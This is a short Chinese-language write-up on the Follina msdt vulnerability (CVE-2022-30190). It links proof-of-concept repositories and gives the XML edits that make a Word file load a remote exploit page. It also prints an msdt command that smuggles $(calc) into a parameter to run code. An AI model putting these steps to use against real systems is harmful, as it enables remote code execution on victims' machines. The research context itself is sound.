https://github.com/chvancooten/follina.py
https://github.com/JMousqueton/PoC-CVE-2022-30190
这个漏洞的本质是word调用IE加载html中的js,而这种微软系软件加载js不受activex保护的影响,导致可以直接RCE。
这种微软系软件包括office,outlook,chm。其中chm见我以前的文章《一条命令一个文件一个游戏》,outlook如下。
https://www.freebuf.com/articles/network/243747.html
office见CVE-2021-40444,其中CVE-2021-40444还有wsf的方法绕过如下。
https://www.t00ls.com/thread-63944-1-1.html
CVE-2022-30190也是CVE-2021-40444的绕过,绕过方式为ms-msdt:/协议。
首先还是要修改正常word的word/_rels/document.xml.rels文件。
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://localhost:81/exploit.html!x-usc:http://localhost:81/exploit.html" TargetMode="External"/><Relationship Id="rId9"
现在此文件已经变得非常敏感,极易被杀毒软件盯上。
还要修改word/document.xml
</v:shape><o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId1337" UpdateMode="OnCall">
用低版本office(2016以下)打开会长时间出现加载服务器和服务器url,CVE-2021-40444也会这样。
最终还是会调用IE加载js,因此这个漏洞对低版本office也是有效的。
但是由于最后利用的是ms-msdt://,因此低版本windows是无效的,甚至部分低版本win10也不行。要高到什么程度呢?用如下命令试一下就知道了。
msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"
如果不支持ms-msdt:/协议,在测试的时候就会出现如下情况。
但是也不是所有支持ms-msdt:/协议的就一定成功,还可能会发生这种情况。
最终我测试成功的win10版本为17763。
原文始发于微信公众号(珂技知识分享):关于CVE-2022-30190,msdt漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论